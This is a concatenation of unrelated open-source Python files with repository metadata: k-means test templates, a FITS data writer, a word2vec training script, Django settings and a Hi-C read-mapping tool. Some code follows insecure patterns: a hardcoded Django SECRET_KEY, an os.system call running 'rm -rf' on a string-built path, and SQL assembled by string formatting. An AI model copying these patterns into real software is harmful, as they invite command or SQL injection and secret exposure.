return ClassificacaodtmPublicForm(**kwargs)
def get_classificacaodtm_cmd(classificacaodtm_id):
"""
    Find a Classificacaodtm by its id
:param classificacaodtm_id: the classificacaodtm id
:return: Command
"""
return NodeSearch(classificacaodtm_id)
def delete_classificacaodtm_cmd(classificacaodtm_id):
"""
Construct a command to delete a Classificacaodtm
:param classificacaodtm_id: classificacaodtm's id
:return: Command
"""
return DeleteNode(classificacaodtm_id)
|
andersonsilvade/5semscript
|
Projeto/backend/apps/classificacaodtm_app/facade.py
|
Python
|
mit
| 2,641 | 0.004165 |
"""!
@brief Test templates for K-Means clustering module.
@authors Andrei Novikov ([email protected])
@date 2014-2020
@copyright BSD-3-Clause
"""
from pyclustering.tests.assertion import assertion
from pyclustering.cluster.encoder import type_encoding, cluster_encoder
from pyclustering.cluster.kmeans import kmeans, kmeans_observer, kmeans_visualizer
from pyclustering.utils import read_sample
from pyclustering.utils.metric import distance_metric, type_metric
from random import random
import numpy
class KmeansTestTemplates:
@staticmethod
def templateLengthProcessData(data, start_centers, expected_cluster_length, ccore, **kwargs):
if isinstance(data, str):
sample = read_sample(data)
else:
sample = data
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
itermax = kwargs.get('itermax', 200)
kmeans_instance = kmeans(sample, start_centers, 0.001, ccore, metric=metric, itermax=itermax)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
centers = kmeans_instance.get_centers()
wce = kmeans_instance.get_total_wce()
if itermax == 0:
assertion.eq(start_centers, centers)
assertion.eq([], clusters)
assertion.eq(0.0, wce)
return
expected_wce = 0.0
for index_cluster in range(len(clusters)):
for index_point in clusters[index_cluster]:
expected_wce += metric(sample[index_point], centers[index_cluster])
assertion.eq(expected_wce, wce)
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
assertion.eq(len(sample), sum(obtained_cluster_sizes))
assertion.eq(len(clusters), len(centers))
for center in centers:
assertion.eq(len(sample[0]), len(center))
if expected_cluster_length is not None:
obtained_cluster_sizes.sort()
expected_cluster_length.sort()
assertion.eq(obtained_cluster_sizes, expected_cluster_length)
@staticmethod
def templatePredict(path_to_file, initial_centers, points, expected_closest_clusters, ccore, **kwargs):
sample = read_sample(path_to_file)
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
itermax = kwargs.get('itermax', 200)
kmeans_instance = kmeans(sample, initial_centers, 0.001, ccore, metric=metric, itermax=itermax)
kmeans_instance.process()
closest_clusters = kmeans_instance.predict(points)
assertion.eq(len(expected_closest_clusters), len(closest_clusters))
assertion.true(numpy.array_equal(numpy.array(expected_closest_clusters), closest_clusters))
@staticmethod
def templateClusterAllocationOneDimensionData(ccore_flag):
input_data = [ [random()] for _ in range(10) ] + [ [random() + 3] for _ in range(10) ] + [ [random() + 5] for _ in range(10) ] + [ [random() + 8] for _ in range(10) ]
kmeans_instance = kmeans(input_data, [ [0.0], [3.0], [5.0], [8.0] ], 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
assertion.eq(4, len(clusters))
for cluster in clusters:
assertion.eq(10, len(cluster))
@staticmethod
def templateEncoderProcedures(filename, initial_centers, number_clusters, ccore_flag):
sample = read_sample(filename)
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
encoding = kmeans_instance.get_cluster_encoding()
encoder = cluster_encoder(encoding, clusters, sample)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LABELING)
encoder.set_encoding(type_encoding.CLUSTER_OBJECT_LIST_SEPARATION)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LIST_SEPARATION)
assertion.eq(number_clusters, len(clusters))
@staticmethod
def templateCollectEvolution(filename, initial_centers, number_clusters, ccore_flag):
sample = read_sample(filename)
observer = kmeans_observer()
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag, observer=observer)
kmeans_instance.process()
assertion.le(1, len(observer))
for i in range(len(observer)):
assertion.le(1, len(observer.get_centers(i)))
for center in observer.get_centers(i):
assertion.eq(len(sample[0]), len(center))
assertion.le(1, len(observer.get_clusters(i)))
@staticmethod
def templateShowClusteringResultNoFailure(filename, initial_centers, ccore_flag):
sample = read_sample(filename)
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
centers = kmeans_instance.get_centers()
figure = kmeans_visualizer.show_clusters(sample, clusters, centers, initial_centers)
kmeans_visualizer.close(figure)
@staticmethod
def templateAnimateClusteringResultNoFailure(filename, initial_centers, ccore_flag):
sample = read_sample(filename)
observer = kmeans_observer()
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag, observer=observer)
kmeans_instance.process()
kmeans_visualizer.animate_cluster_allocation(sample, observer)
|
annoviko/pyclustering
|
pyclustering/cluster/tests/kmeans_templates.py
|
Python
|
gpl-3.0
| 5,793 | 0.008113 |
import numpy as np
from shesha.util.writers.common import dm
from shesha.util.writers.common import wfs
from shesha.util.writers.common import imat
from astropy.io import fits
def wfs_to_fits_hdu(sup, wfs_id):
"""Return a fits Header Data Unit (HDU) representation of a single WFS
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the WFS in the supervisor
Returns:
hdu : (ImageHDU) : fits representation of the WFS
"""
hdu_name = "WFS" + str(wfs_id)
X,Y = wfs.get_subap_pos_meter(sup, wfs_id)
valid_subap = np.array([X,Y],dtype=np.float64)
hdu = fits.ImageHDU( valid_subap, name=hdu_name)
hdu.header["NSSP"] = sup.config.p_wfss[wfs_id].get_nxsub()
hdu.header["SSPSIZE"] = sup.config.p_wfss[wfs_id].get_subapd()
return hdu
def dm_to_fits_hdu(sup, dm_id):
"""Return a fits Header Data Unit (HDU) representation of a single DM
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the DM in the supervisor
Returns:
hdu : (ImageHDU) : fits representation of the DM
"""
hdu_name = "DM" + str(dm_id)
X,Y = dm.get_actu_pos_meter(sup, dm_id)
valid_subap = np.array([X,Y],dtype=np.float64)
hdu = fits.ImageHDU( valid_subap, name=hdu_name)
hdu.header["NACTU"] = sup.config.p_dms[dm_id].get_nact()
hdu.header["PITCH"] = sup.config.p_dms[dm_id].get_pitch()
hdu.header["COUPLING"] = sup.config.p_dms[dm_id].get_coupling()
hdu.header["ALT"] = sup.config.p_dms[dm_id].get_alt()
return hdu
def dm_influ_to_fits_hdu(sup, dm_id, *, influ_index=-1):
"""Return a fits Header Data Unit (HDU) holding the influence functions of a specific DM
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the DM in the supervisor
Kwargs:
influ_index : (int) : (optional) default -1, index of the actuator to get the influence function from. -1 : get all influence functions
Returns:
hdu : (ImageHDU) : hdu holding the DM influence functions
"""
hdu_name = "INFLU_DM" + str(dm_id)
if influ_index < 0 :
influ_fct = sup.config.p_dms[dm_id].get_influ().astype(np.float64)
else :
influ_fct = sup.config.p_dms[dm_id].get_influ()[:,:,influ_index].astype(np.float64)
hdu = fits.ImageHDU( influ_fct, name=hdu_name)
return hdu
def write_data(file_name, sup, *, wfss_indices=None, dms_indices=None,
controller_id=0, influ=0, compose_type="controller"):
""" Write data for yao compatibility
write into a single fits:
    * number of valid subapertures
    * number of actuators
    * subaperture positions (2-dim array x,y) in meters, centered
    * actuator positions (2-dim array x,y) in meters
* interaction matrix (2*nSubap , nactu)
* command matrix (nacy , 2*nSubap)
Args:
file_name : (str) : data file name
sup : (compasSSupervisor) : supervisor
    Kwargs:
wfss_indices : (list[int]) : optional, default all, list of the wfs indices to include
dms_indices : (list[int]) : optional, default all, list of the DM indices to include
controller_id : (int) : optional, index of the controller passed to yao
influ : (int) : optional, actuator index for the influence function
compose_type : (str) : optional, possibility to specify split tomography case ("controller" or "splitTomo")
"""
print("writing data to" + file_name)
hdul=fits.HDUList([])
# setting list of wfs and dm
conf = sup.config
if(wfss_indices is None):
wfss_indices = np.arange(len(conf.p_wfss))
if(dms_indices is None):
dms_indices = []
for i in range(len(conf.p_dms)):
if( conf.p_dms[i].type != "tt"):
dms_indices.append(i)
    # count the number of LGS
n_lgs = 0
for i in wfss_indices :
if(conf.p_wfss[i].get_gsalt() > 0):
n_lgs += 1
#primary hdu contains only keywords for sanity check
hdu = fits.PrimaryHDU(np.zeros(1,dtype=np.int32))
hdu.header["DIAM"] = conf.p_tel.get_diam()
hdu.header["COBS"] = conf.p_tel.get_cobs()
hdu.header["NLGS"] = n_lgs
hdu.header["NNGS"] = len(wfss_indices) - n_lgs
hdu.header["NDM" ] = len(dms_indices)
hdu.header["PIXSIZE"] = conf.p_geom.get_pixsize()
#add primary hdu to list
hdul.append(hdu)
# add wfss
for i in wfss_indices:
hdul.append( wfs_to_fits_hdu(sup, i))
# add dm
for i in dms_indices:
hdul.append(dm_to_fits_hdu(sup, i))
hdul.append(dm_influ_to_fits_hdu(sup, i, influ_index = influ))
if(controller_id > -1):
# IMAT
interaction_mat=imat.compose_imat(sup, compose_type=compose_type,
controller_id=controller_id)
hdu_imat=fits.ImageHDU(interaction_mat,name="IMAT")
# CMAT
hdu_cmat=fits.ImageHDU(sup.rtc.get_command_matrix(controller_id),
name="CMAT")
print("\t* number of subaperture per WFS")
print("\t* subapertures position")
print("\t* number of actuator per DM")
print("\t* actuators position")
print("\t* Imat")
print("\t* Cmat")
hdul.writeto(file_name, overwrite=1)
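# Illustrative call (supervisor construction omitted; "sup" is assumed to be an
# already-initialised COMPASS supervisor and the file name is arbitrary):
#   write_data("sys-compass.fits", sup, controller_id=0, influ=0)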
|
ANR-COMPASS/shesha
|
shesha/util/writers/common/fits.py
|
Python
|
gpl-3.0
| 5,305 | 0.00754 |
"""
Compute WordVectors using Yelp Data
"""
from gensim.models.word2vec import Word2Vec
from util.language import detect_language, tokenize_text
from data_handling import get_reviews_data
# Set to true for zero in in English reviews. Makes the process much slower
FILTER_ENGLISH = True
# Name for output w2v model file
OUTPUT_MODEL_FILE = "w2v_yelp_100_alpha_0.025_window_4"
PICKLED_DATA = "/home/alfredo/deep-nlp/data/reviews.pickle."
NUM_PARTITIONS = 2 # Use all data
reviews_texts, _, _, _, _ = get_reviews_data(range(1, NUM_PARTITIONS), PICKLED_DATA)
# Each review will be considered a sentence
sentences = []
for num, text in enumerate(reviews_texts):
if num % 10000 == 0:
print "%d out of %d reviews read" % (num, len(reviews_texts))
if FILTER_ENGLISH:
if detect_language(text) == u"english":
sentences.append(tokenize_text(text))
else:
sentences.append(text)
# Build a w2v model
w2v = Word2Vec(sentences=sentences, size=100, alpha=0.025, window=4, min_count=2, sample=1e-5, workers=4, negative=10)
w2v.save(OUTPUT_MODEL_FILE)
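# Quick sanity check on the trained vectors (the query word is an illustrative
# assumption; any frequent token from the reviews works):
#   print(w2v.most_similar('pizza', topn=5))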
|
lukedeo/fancy-cnn
|
datasets/yelp/yelp_w2v.py
|
Python
|
mit
| 1,086 | 0.003683 |
# Django settings for python project.
DEBUG = True
import logging
LOG_LEVEL = logging.INFO
if DEBUG:
LOG_LEVEL = logging.DEBUG
logging.basicConfig(
level = LOG_LEVEL,
format = '[%(asctime)s %(name)s %(levelname)s] %(message)s',
)
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASE_ENGINE = '' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'ado_mssql'.
DATABASE_NAME = '' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
# Local time zone for this installation. Choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
# although not all variations may be possible on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '!q2sh7ue8^=bu&wj9tb9&4fx^dayk=wnxo^mtd)xmw1y2)6$w$'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.doc.XViewMiddleware',
)
ROOT_URLCONF = 'python.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
)
|
GdZ/scriptfile
|
software/googleAppEngine/lib/PyAMF/doc/tutorials/examples/actionscript/bytearray/python/settings.py
|
Python
|
mit
| 2,999 | 0.003334 |
"""
information needed
- path to FASTQ
- path to reference genome
- path to indexed reference genome
- read number (1/2)
- restriction enzyme used
- species name
- chromosome names (optional)
- descriptive fields (optional, e.g. --descr=flowcell:C68AEACXX,lane:4,index:24nf)
mapping strategy
- iterative/fragment
- mapper
"""
from __future__ import print_function
from os import path, remove, system
from string import ascii_letters
from random import random
from shutil import copyfile
from multiprocessing import cpu_count
from subprocess import PIPE, STDOUT, Popen
from pickle import load, UnpicklingError
from argparse import HelpFormatter
from traceback import print_exc
import logging
import sqlite3 as lite
import time
from pytadbit.mapping.restriction_enzymes import RESTRICTION_ENZYMES, identify_re
from pytadbit.utils.fastq_utils import quality_plot
from pytadbit.utils.file_handling import which, mkdir, is_fastq
from pytadbit.mapping.full_mapper import full_mapping, fast_fragment_mapping
from pytadbit.parsers.genome_parser import parse_fasta
from pytadbit.utils.sqlite_utils import get_path_id, add_path, print_db, retry
from pytadbit.utils.sqlite_utils import get_jobid, already_run, digest_parameters
from pytadbit import get_dependencies_version
DESC = "Map Hi-C reads and organize results in an output working directory"
def run(opts):
check_options(opts)
launch_time = time.localtime()
    # hash that is going to be appended to output file names
param_hash = digest_parameters(opts, get_md5=True)
# create tmp directory
if not opts.tmp:
temp_dir = opts.workdir + '_tmp_r%d_%s' % (opts.read, param_hash)
else:
temp_dir = path.join(opts.tmp,
'TADbit_tmp_r%d_%s' % (opts.read, param_hash))
# QC plot
fig_path = path.join(opts.workdir,
'%s_%s_%s.png' % (path.split(opts.fastq)[-1],
'-'.join(map(str, opts.renz)), param_hash))
logging.info('Generating Hi-C QC plot')
dangling_ends, ligated = quality_plot(opts.fastq, r_enz=opts.renz,
nreads=100000, paired=False,
savefig=fig_path)
for renz in dangling_ends:
logging.info(' - Dangling-ends (sensu-stricto): %.3f%%', dangling_ends[renz])
for renz in ligated:
logging.info(' - Ligation sites: %.3f%%', ligated[renz])
if opts.skip_mapping:
save_to_db(opts, dangling_ends, ligated, fig_path, [], launch_time, time.localtime())
return
# Mapping
if opts.fast_fragment:
mkdir(path.join(opts.workdir, '03_filtered_reads'))
logging.info('parsing genomic sequence')
try:
# allows the use of pickle genome to make it faster
genome_seq = load(open(opts.genome[0],'rb'))
except (UnpicklingError, KeyError):
genome_seq = parse_fasta(opts.genome)
logging.info('mapping %s and %s to %s', opts.fastq, opts.fastq2, opts.workdir)
outfiles = fast_fragment_mapping(opts.index, opts.fastq, opts.fastq2,
opts.renz, genome_seq,
path.join(opts.workdir, '03_filtered_reads',
'all_r1-r2_intersection_%s.tsv' % param_hash),
clean=not opts.keep_tmp, get_nread=True,
mapper_binary=opts.mapper_binary,
mapper_params=opts.mapper_param, suffix=param_hash,
temp_dir=temp_dir, nthreads=opts.cpus)
else:
logging.info('mapping %s read %s to %s', opts.fastq, opts.read, opts.workdir)
outfiles = full_mapping(opts.index, opts.fastq,
path.join(opts.workdir,
'01_mapped_r%d' % (opts.read)), mapper=opts.mapper,
r_enz=opts.renz, temp_dir=temp_dir, nthreads=opts.cpus,
frag_map=not opts.iterative, clean=not opts.keep_tmp,
windows=opts.windows, get_nread=True, skip=opts.skip,
suffix=param_hash, mapper_binary=opts.mapper_binary,
mapper_params=opts.mapper_param)
# adjust line count
if opts.skip:
for i, (out, _) in enumerate(outfiles[1:], 1):
outfiles[i] = out, outfiles[i-1][1] - sum(1 for _ in open(outfiles[i-1][0]))
finish_time = time.localtime()
    # save all job information to sqlite DB
    try:
        save_to_db(opts, dangling_ends, ligated, fig_path, outfiles, launch_time, finish_time)
except Exception as e:
# release lock
remove(path.join(opts.workdir, '__lock_db'))
print_exc()
exit(1)
# write machine log
try:
while path.exists(path.join(opts.workdir, '__lock_log')):
time.sleep(0.5)
open(path.join(opts.workdir, '__lock_log'), 'a').close()
with open(path.join(opts.workdir, 'trace.log'), "a") as mlog:
mlog.write('\n'.join([
('# MAPPED READ%s\t%d\t%s' % (opts.read, num, out))
for out, num in outfiles]) + '\n')
# release lock
try:
remove(path.join(opts.workdir, '__lock_log'))
except OSError:
pass
except Exception as e:
# release lock
remove(path.join(opts.workdir, '__lock_db'))
print_exc()
exit(1)
# clean
if not opts.keep_tmp:
logging.info('cleaning temporary files')
system('rm -rf ' + temp_dir)
def check_options(opts):
if not opts.mapper_binary:
if opts.mapper == 'gem':
opts.mapper_binary = 'gem-mapper'
else:
opts.mapper_binary = opts.mapper
opts.mapper_binary = which(opts.mapper_binary)
if not opts.mapper_binary:
raise Exception('\n\nERROR: Mapper binary not found, for GEM install it from:'
'\nhttps://sourceforge.net/projects/gemlibrary/files/gem-library/Binary%20pre-release%202/'
                        '\n - Download the GEM-binaries-Linux-x86_64-core_i3 if '
                        'you have a recent computer, the '
'GEM-binaries-Linux-x86_64-core_2 otherwise\n - '
'Uncompress with "tar xjvf GEM-binaries-xxx.tbz2"\n - '
'Copy the binary gem-mapper to /usr/local/bin/ for '
'example (somewhere in your PATH).\n\nNOTE: GEM does '
'not provide any binary for MAC-OS.')
opts.gem_version = 0
if opts.mapper == 'gem':
opts.gem_version = None
try:
out, _ = Popen([opts.mapper_binary,'--version'], stdout=PIPE,
stderr=STDOUT, universal_newlines=True).communicate()
opts.gem_version = int(out[1])
except ValueError as e:
opts.gem_version = 2
            print('Falling back to GEM v2')
if opts.fast_fragment:
if opts.gem_version < 3:
raise Exception('ERROR: Fast fragment mapping needs GEM v3')
if not opts.fastq2 or not path.exists(opts.fastq2):
raise Exception('ERROR: Fast fragment mapping needs both fastq files. '
'Please specify --fastq2')
if opts.read != 0:
raise Exception('ERROR: Fast fragment mapping needs to be specified with --read 0')
if not opts.genome: raise Exception('ERROR: Fast fragment mapping needs '
'the genome parameter.')
# check RE name
if opts.renz == ['CHECK']:
print('\nSearching for most probable restriction enzyme in file: %s' % (opts.fastq))
try:
pat, enz, pv = identify_re(opts.fastq, nreads=100000)
print(' -> Most probable digested site: %s (pv: %f)' % (pat, pv))
print(' -> Enzymes matching: %s' % (', '.join(enz)))
except ValueError:
print(' -> Nothing found...')
exit()
for n, renz in enumerate(opts.renz):
if renz == 'NONE':
opts.renz[n] = None
continue
try:
_ = RESTRICTION_ENZYMES[renz]
except KeyError:
            print('\n\nERROR: restriction enzyme %s not found.' % (renz)
                  + ' Use one of:\n\n'
                  + ' '.join(sorted(RESTRICTION_ENZYMES)) + '\n\n')
raise KeyError()
except AttributeError:
pass
# check skip
if not path.exists(opts.workdir) and opts.skip:
        print('WARNING: cannot reuse previous output files (workdir not found), not skipping...')
opts.skip = False
# number of cpus
if opts.cpus == 0:
opts.cpus = cpu_count()
else:
opts.cpus = min(opts.cpus, cpu_count())
# check paths
if opts.mapper == 'gem' and not path.exists(opts.index):
raise IOError('ERROR: index file not found at ' + opts.index)
if not path.exists(opts.fastq):
raise IOError('ERROR: FASTQ file not found at ' + opts.fastq)
if not is_fastq(opts.fastq):
        raise IOError(('ERROR: FASTQ file %s has a wrong format, please check it') % (opts.fastq))
try:
opts.windows = [[int(i) for i in win.split(':')]
for win in opts.windows]
except TypeError:
pass
mkdir(opts.workdir)
# write log
# if opts.mapping_only:
log_format = '[MAPPING {} READ{}] %(message)s'.format(opts.fastq, opts.read)
# else:
# log_format = '[DEFAULT] %(message)s'
# reset logging
logging.getLogger().handlers = []
try:
print('Writing log to ' + path.join(opts.workdir, 'process.log'))
logging.basicConfig(level=logging.INFO,
format=log_format,
filename=path.join(opts.workdir, 'process.log'),
filemode='a+')
except IOError:
logging.basicConfig(level=logging.DEBUG,
format=log_format,
filename=path.join(opts.workdir, 'process.log2'),
filemode='a+')
# to display log on stdout also
logging.getLogger().addHandler(logging.StreamHandler())
# write version log
vlog_path = path.join(opts.workdir, 'TADbit_and_dependencies_versions.log')
dependencies = get_dependencies_version()
    if not path.exists(vlog_path) or open(vlog_path).read() != dependencies:
logging.info('Writing versions of TADbit and dependencies')
vlog = open(vlog_path, 'w')
vlog.write(dependencies)
vlog.close()
# check mapper extra options
if opts.mapper_param:
if (len(opts.mapper_param) == 1
and ('-' in opts.mapper_param[0] or
'--' in opts.mapper_param[0])):
# Single string surrounded by quotes
opts.mapper_param = opts.mapper_param[0].split()
else:
opts.mapper_param = dict([o.split(':') for o in opts.mapper_param])
else:
opts.mapper_param = {}
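    # For illustration: "--mapper_param e:0.05 max-big-indel-length:10" is parsed
    # into {'e': '0.05', 'max-big-indel-length': '10'}, while a single quoted
    # string such as --mapper_param "-e 0.05" is simply split on whitespace above.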
if opts.mapper == 'gem' and opts.gem_version < 3:
gem_valid_option = set(["granularity", "q", "quality-format",
"gem-quality-threshold", "mismatch-alphabet",
"m", "e", "min-matched-bases",
"max-big-indel-length", "s", "strata-after-best",
"fast-mapping", "unique-mapping", "d", "D",
"allow-incomplete-strata", "max-decoded-matches",
"min-decoded-strata", "p", "paired-end-alignment",
"b", "map-both-ends", "min-insert-size",
"max-insert-size", "E", "max-extendable-matches",
"max-extensions-per-match", "unique-pairing"])
for k in opts.mapper_param:
if not k in gem_valid_option:
                raise NotImplementedError(('ERROR: option "%s" is not a valid GEM option '
                                           'or not supported by this tool.') % k)
    # create an empty DB if it does not exist
dbpath = path.join(opts.workdir, 'trace.db')
open(dbpath, 'a').close()
# for lustre file system....
if 'tmpdb' in opts and opts.tmpdb:
dbdir = opts.tmpdb
# tmp file
dbfile = 'trace_%s' % (''.join([ascii_letters[int(random() * 52)]
for _ in range(10)]))
opts.tmpdb = path.join(dbdir, dbfile)
try:
copyfile(path.join(opts.workdir, 'trace.db'), opts.tmpdb)
except IOError:
pass
# check if job already run using md5 digestion of parameters
if already_run(opts):
if 'tmpdb' in opts and opts.tmpdb:
remove(path.join(dbdir, dbfile))
exit('WARNING: exact same job already computed, see JOBs table above')
@retry(lite.OperationalError, tries=20, delay=2)
def save_to_db(opts, dangling_ends, ligated, fig_path, outfiles, launch_time, finish_time):
"""
write little DB to keep track of processes and options
"""
if 'tmpdb' in opts and opts.tmpdb:
# check lock
while path.exists(path.join(opts.workdir, '__lock_db')):
time.sleep(0.5)
# close lock
open(path.join(opts.workdir, '__lock_db'), 'a').close()
# tmp file
dbfile = opts.tmpdb
try: # to copy in case read1 was already mapped for example
copyfile(path.join(opts.workdir, 'trace.db'), dbfile)
except IOError:
pass
else:
dbfile = path.join(opts.workdir, 'trace.db')
con = lite.connect(dbfile)
with con:
# check if table exists
cur = con.cursor()
cur.execute("""SELECT name FROM sqlite_master WHERE
type='table' AND name='MAPPED_INPUTs'""")
if not cur.fetchall():
try:
cur.execute("""
create table PATHs
(Id integer primary key,
JOBid int, Path text, Type text,
unique (Path))""")
except lite.OperationalError:
                pass  # may happen when mapped files are cleaned
cur.execute("""
create table JOBs
(Id integer primary key,
Parameters text,
Launch_time text,
Finish_time text,
Type text,
Parameters_md5 text,
unique (Parameters_md5))""")
cur.execute("""
create table MAPPED_INPUTs
(Id integer primary key,
PATHid int,
Entries int,
Trim text,
Frag text,
Read int,
Enzyme text,
Dangling_Ends text,
Ligation_Sites text,
WRKDIRid int,
MAPPED_OUTPUTid int,
INDEXid int,
unique (PATHid,Entries,Read,Enzyme,WRKDIRid,MAPPED_OUTPUTid,INDEXid))""")
try:
parameters = digest_parameters(opts, get_md5=False)
param_hash = digest_parameters(opts, get_md5=True)
cur.execute("""
insert into JOBs
(Id , Parameters, Launch_time, Finish_time, Type , Parameters_md5)
values
(NULL, '%s', '%s', '%s', 'Map', '%s')
""" % (parameters,
time.strftime("%d/%m/%Y %H:%M:%S", launch_time),
time.strftime("%d/%m/%Y %H:%M:%S", finish_time), param_hash))
except lite.IntegrityError:
pass
jobid = get_jobid(cur)
add_path(cur, opts.workdir, 'WORKDIR', jobid)
add_path(cur, opts.fastq , 'MAPPED_FASTQ' , jobid, opts.workdir)
add_path(cur, opts.index , 'INDEX' , jobid, opts.workdir)
add_path(cur, fig_path , 'FIGURE' , jobid, opts.workdir)
for i, (out, num) in enumerate(outfiles):
try:
window = opts.windows[i]
except IndexError:
window = opts.windows[-1]
except TypeError:
window = 'None'
add_path(cur, out,'2D_BED' if opts.read == 0 else 'SAM/MAP', jobid, opts.workdir)
frag = ('none' if opts.iterative else 'fast_frag' if opts.read == 0
else 'frag' if i==len(outfiles) - 1 else 'full')
try:
cur.execute("""
insert into MAPPED_INPUTs
(Id , PATHid, Entries, Trim, Frag, Read, Enzyme, Dangling_Ends, Ligation_Sites, WRKDIRid, MAPPED_OUTPUTid, INDEXid)
values
(NULL, %d, %d, '%s', '%s', %d, '%s', '%s', '%s', %d, %d, %d)
""" % (get_path_id(cur, opts.fastq, opts.workdir), num, window, frag,
opts.read, '-'.join(map(str, opts.renz)),
' '.join('%s:%.3f%%' % (r, dangling_ends.get(r, float('nan'))) for r in opts.renz),
' '.join('%s:%.3f%%' % ('-'.join(r), ligated.get(r, float('nan'))) for r in ligated),
get_path_id(cur, opts.workdir),
get_path_id(cur, out, opts.workdir),
get_path_id(cur, opts.index, opts.workdir)))
except lite.IntegrityError:
pass
print_db(cur, 'MAPPED_INPUTs')
print_db(cur, 'PATHs' )
print_db(cur, 'JOBs' )
if 'tmpdb' in opts and opts.tmpdb:
# copy back file
copyfile(dbfile, path.join(opts.workdir, 'trace.db'))
remove(dbfile)
# release lock
try:
remove(path.join(opts.workdir, '__lock_db'))
except OSError:
pass
def get_options_from_cfg(cfg_file, opts):
raise NotImplementedError()
def populate_args(parser):
"""
parse option from call
"""
parser.formatter_class=lambda prog: HelpFormatter(prog, width=95,
max_help_position=27)
glopts = parser.add_argument_group('General options')
mapper = parser.add_argument_group('Mapping options')
descro = parser.add_argument_group('Descriptive, optional arguments')
# glopts.add_argument('--cfg', dest='cfg', metavar="PATH", action='store',
# default=None, type=str,
# help='path to a configuration file with predefined ' +
# 'parameters')
glopts.add_argument('--skip_mapping', dest='skip_mapping', action='store_true',
default=False,
help='generate a Hi-C specific quality plot from FASTQ and exits')
glopts.add_argument('-w', '--workdir', dest='workdir', metavar="PATH",
action='store', default=None, type=str, required=True,
help='path to an output folder.')
glopts.add_argument('--fastq', dest='fastq', metavar="PATH", action='store',
default=None, type=str, required=True,
help='path to a FASTQ files (can be compressed files)')
glopts.add_argument('--fastq2', dest='fastq2', metavar="PATH", action='store',
default=None, type=str, required=False,
help='''(beta) path to a FASTQ file of read 2 (can be compressed
files). Needed for fast_fragment''')
glopts.add_argument('--index', dest='index', metavar="PATH",
type=str, required=True,
help='''paths to file(s) with indexed FASTA files of the
reference genome.''')
glopts.add_argument('--genome', dest='genome', metavar="PATH", nargs='+',
type=str,
help='''paths to file(s) with FASTA files of the
reference genome. Needed for fast_fragment mapping.
If many, files will be concatenated.
I.e.: --genome chr_1.fa chr_2.fa
                        In this last case, order is important for the rest of the
analysis. Note: it can also be the path to a previously
parsed genome in pickle format.''')
glopts.add_argument('--read', dest='read', metavar="INT",
type=int, required=True,
help='read number')
glopts.add_argument('--renz', dest='renz', metavar="STR",
type=str, required=True, nargs='+',
help='''restriction enzyme name(s). Use "--renz CHECK"
to search for most probable and exit; and use
"--renz NONE" to avoid using RE site information.''')
glopts.add_argument('--chr_name', dest='chr_name', metavar="STR", nargs='+',
default=[], type=str,
help='''[fasta header] chromosome name(s). Used in the
same order as data.''')
glopts.add_argument('--tmp', dest='tmp', metavar="PATH", action='store',
default=None, type=str,
help='''path to a temporary directory (default next to
"workdir" directory)''')
glopts.add_argument('--tmpdb', dest='tmpdb', action='store', default=None,
metavar='PATH', type=str,
help='''if provided uses this directory to manipulate the
database''')
glopts.add_argument('--noX', action='store_true', help='no display server (X screen)')
mapper.add_argument('--iterative', dest='iterative', default=False,
action='store_true',
help='''default mapping strategy is fragment based
use this flag for iterative mapping''')
mapper.add_argument('--fast_fragment', dest='fast_fragment', default=False,
action='store_true',
help='''(beta) use fast fragment mapping. Both fastq files are mapped using
fragment based mapping in GEM v3. The output file is an intersected
                        read file that can be used directly in tadbit filter
(no tadbit parse needed). Access to samtools is needed for
fast_fragment to work.
                        --fastq2 and --genome need to be
specified and --read value should be 0.''')
